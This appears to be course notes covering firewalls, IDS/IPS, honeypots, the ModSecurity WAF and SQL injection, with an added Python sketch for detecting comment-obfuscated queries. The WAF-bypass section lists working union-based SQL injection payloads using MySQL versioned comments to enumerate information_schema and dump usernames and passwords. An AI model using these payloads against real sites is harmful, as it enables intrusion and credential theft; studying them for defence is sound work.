Firewall, IDS, IPS, Intro to WAF Bypassing, Blind Based SQL Injection
= FIREWALL, IDS, IPS
= INTRO TO WAF, WAF BYPASSING
= BLIND BASED SQL INJECTION
= Firewalls : These are network endpoint security components which help us filter network traffic via inbound and outbound rules.
TWO TYPES :
– SOFTWARE BASED FIREWALLS : These have limited rules and most of them are open source. E.g. Windows Firewall, IPTables etc.
– HARDWARE BASED FIREWALLS : These have advanced features with more security and are paid. E.g. Sophos Firewall, Cyberoam, Endian, Fortinet etc.
IDS stands for Intrusion Detection System. It is a software or hardware based program which detects every suspicious activity and creates a log for it. It can also send the logs immediately to the Network Administrator so that they can find out that there is an intruder in the network.
It can be divided into different types such as NIDS (Network IDS), HIDS (Host IDS), WIDS (Wireless IDS) etc.
IPS stands for Intrusion Prevention System. It works by immediately blocking intruders who are carrying out malicious and illegal activities in the network or against its clients.
E.g. of IDS and IPS – SNORT etc.
A honeypot is a technique for attracting and luring a hacker or attacker into a trap. It can be a web application, a network system or an access point (wireless connection) which seems absolutely normal but is created to trap attackers.
INTRODUCTION TO WAF – A web application firewall works like a network firewall, with inbound and outbound rulesets, but it protects a web application or web site rather than a network. A WAF filters HTTP and HTTPS traffic, along with the communication handling done by TCP/UDP, and also works with some advanced mitigation programs such as protections for the OWASP Top 10.
E.G. MOD SECURITY
INSTALLING AND CONFIGURING MOD SECURITY WAF
OS – UBUNTU 14.04
Mod Security WAF
BYPASSING MOD WAF
= Finding GET Method.
= Generating SQL Syntax Error by (')
= To check the number of columns by ORDER BY.
= Getting Vulnerable Columns by UNION SELECT.
= Getting an error while finding out the Vulnerable Columns.
Inline Executable Comments
Union – /*!UniOn*/
Select – /*!SelECt*/
But these will only work if the DB version is less than 6. The version is always in decimal notation; we can also write it with the periods (.) removed. E.g. 5.00.00 -> 50000
So to find out whether the Inline Comments work or not, we have to put the Database Version with Union Select like :
= php?id=1' /*!50000UniOn*/ /*!50000SelECt*/ 1,2--+
= To get the database and version :
/*!50000UniOn*/ /*!50000SelECt*/ database(),version()--+
= To get the table name from information_schema :
/*!50000UniOn*/ /*!50000SelECt*/ 1,table_name from /*!50000Information_schema.tables*/--+
= To get the column name from users table :
/*!50000UniOn*/ /*!50000SelECt*/ 1,column_name from /*!50000Information_schema.columns*/ where table_name="users"--+
= To get the data:
/*!50000UniOn*/ /*!50000SelECt*/ 1,/*!50000Group_concat(User_id,Users,Password)*/ from users--+
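Added example (not part of the original notes, and not ModSecurity's own rules): a Python sketch of the detection side of the steps above. It shows why a keyword rule on the raw parameter misses the /*!50000...*/ form and how unwrapping MySQL executable comments before matching catches it. Function names, rule names and the sample values are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*!NNNNN body */ and of /*! body */ as SQL.
VERSIONED = re.compile(r"/\*!(?:\d{5,6})?(.*?)\*/", re.S)
PLAIN = re.compile(r"/\*(?!!).*?\*/", re.S)  # ordinary comment, ignored by MySQL

# Hypothetical rule set, applied only to the normalised value.
RULES = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information-schema": re.compile(r"\binformation_schema\b"),
}

def naive_match(value):
    """Weak rule: keyword regex on the raw parameter, no normalisation."""
    return re.search(r"union\s+select", value, re.I) is not None

def normalize(value):
    """Rewrite the parameter to roughly what the MySQL parser will see."""
    text = unquote_plus(value)                               # %27 -> ', + -> space
    text = VERSIONED.sub(lambda m: f" {m.group(1)} ", text)  # keep the executed body
    text = PLAIN.sub(" ", text)                              # drop inert comments
    return re.sub(r"\s+", " ", text).strip().lower()

def detect(value):
    """Return the sorted names of the rules that fire on this parameter."""
    norm = normalize(value)
    hits = [name for name, rx in RULES.items() if rx.search(norm)]
    if VERSIONED.search(unquote_plus(value)):
        hits.append("versioned-comment")  # rarely seen in legitimate input
    return sorted(hits)

# Constructed parameter values; the first two reuse strings from the steps above.
SAMPLES = [
    "1' /*!50000UniOn*/ /*!50000SelECt*/ 1,2--+",
    "/*!50000UniOn*/ /*!50000SelECt*/ 1,table_name from "
    "/*!50000Information_schema.tables*/--+",
    "trade union selection",
    "42",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r}: naive={naive_match(sample)} rules={detect(sample)}")
```

Normalising before matching is a detection layer only; parameterised queries in the application remove the injection itself.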
BLIND BASED SQL INJECTION
Blind Based SQL injection is a type of SQL injection attack vector which doesn't give us any SQL Syntax Error, but can still possibly be done.
If there is some data in the web application, it will show the data, else it will reload the same page.
1. Finding the GET Method
2. Finding the vulnerability by (')
3. Finding the number of columns in the database by doing ORDER BY in any ID in which we get Data.
4. Finding the Vulnerable column by Union Select.
5. Same steps further as Union Based SQL Injection.